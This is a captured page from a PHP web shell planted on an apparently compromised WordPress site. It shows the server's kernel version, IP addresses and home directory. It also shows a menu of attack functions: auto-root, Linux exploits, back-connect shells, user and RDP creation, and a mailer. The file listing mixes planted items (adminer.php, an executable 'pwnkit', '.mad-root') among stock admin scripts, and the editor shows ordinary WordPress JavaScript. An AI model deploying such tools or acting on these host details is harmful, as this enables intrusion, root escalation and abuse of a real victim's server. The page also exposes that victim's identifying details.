Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.54
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
yvffpqmy /
dataharbor.africa /
wp-admin /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
widgets
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
accordion.min.js
758
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
color-picker.min.js
3.4
KB
-rw-r--r--
comment.js
2.85
KB
-rw-r--r--
common.min.js
23.12
KB
-rw-r--r--
custom-header.js
1.98
KB
-rw-r--r--
dashboard.min.js
8.65
KB
-rw-r--r--
edit-comments.js
37.12
KB
-rw-r--r--
editor-expand.js
41.61
KB
-rw-r--r--
editor.min.js
12.76
KB
-rw-r--r--
farbtastic.js
7.67
KB
-rw-r--r--
gallery.js
5.41
KB
-rw-r--r--
image-edit.js
39.98
KB
-rw-r--r--
inline-edit-post.js
20.17
KB
-rw-r--r--
language-chooser.js
890
B
-rw-r--r--
language-chooser.min.js
423
B
-rw-r--r--
link.js
3.89
KB
-rw-r--r--
media-gallery.js
1.27
KB
-rw-r--r--
media-upload.min.js
1.13
KB
-rw-r--r--
post.js
38.68
KB
-rw-r--r--
postbox.js
18.49
KB
-rw-r--r--
privacy-tools.js
10.67
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
revisions.min.js
17.97
KB
-rw-r--r--
site-icon.min.js
2.2
KB
-rw-r--r--
tags-suggest.min.js
2.22
KB
-rw-r--r--
tags.js
4.85
KB
-rw-r--r--
updates.js
109.33
KB
-rw-r--r--
user-profile.min.js
6.7
KB
-rw-r--r--
user-suggest.min.js
676
B
-rw-r--r--
widgets.js
22.56
KB
-rw-r--r--
word-count.js
7.52
KB
-rw-r--r--
xfn.min.js
458
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom-header.js
/** * @output wp-admin/js/custom-header.js */ /* global isRtl */ /** * Initializes the custom header selection page. * * @since 3.5.0 * * @deprecated 4.1.0 The page this is used on is never linked to from the UI. * Setting a custom header is completely handled by the Customizer. */ (function($) { var frame; $( function() { // Fetch available headers. var $headers = $('.available-headers'); // Apply jQuery.masonry once the images have loaded. $headers.imagesLoaded( function() { $headers.masonry({ itemSelector: '.default-header', isRTL: !! ( 'undefined' != typeof isRtl && isRtl ) }); }); /** * Opens the 'choose from library' frame and creates it if it doesn't exist. * * @since 3.5.0 * @deprecated 4.1.0 * * @return {void} */ $('#choose-from-library-link').on( 'click', function( event ) { var $el = $(this); event.preventDefault(); // If the media frame already exists, reopen it. if ( frame ) { frame.open(); return; } // Create the media frame. frame = wp.media.frames.customHeader = wp.media({ // Set the title of the modal. title: $el.data('choose'), // Tell the modal to show only images. library: { type: 'image' }, // Customize the submit button. button: { // Set the text of the button. text: $el.data('update'), // Tell the button not to close the modal, since we're // going to refresh the page when the image is selected. close: false } }); /** * Updates the window location to include the selected attachment. * * @since 3.5.0 * @deprecated 4.1.0 * * @return {void} */ frame.on( 'select', function() { // Grab the selected attachment. var attachment = frame.state().get('selection').first(), link = $el.data('updateLink'); // Tell the browser to navigate to the crop step. window.location = link + '&file=' + attachment.id; }); frame.open(); }); }); }(jQuery));
Close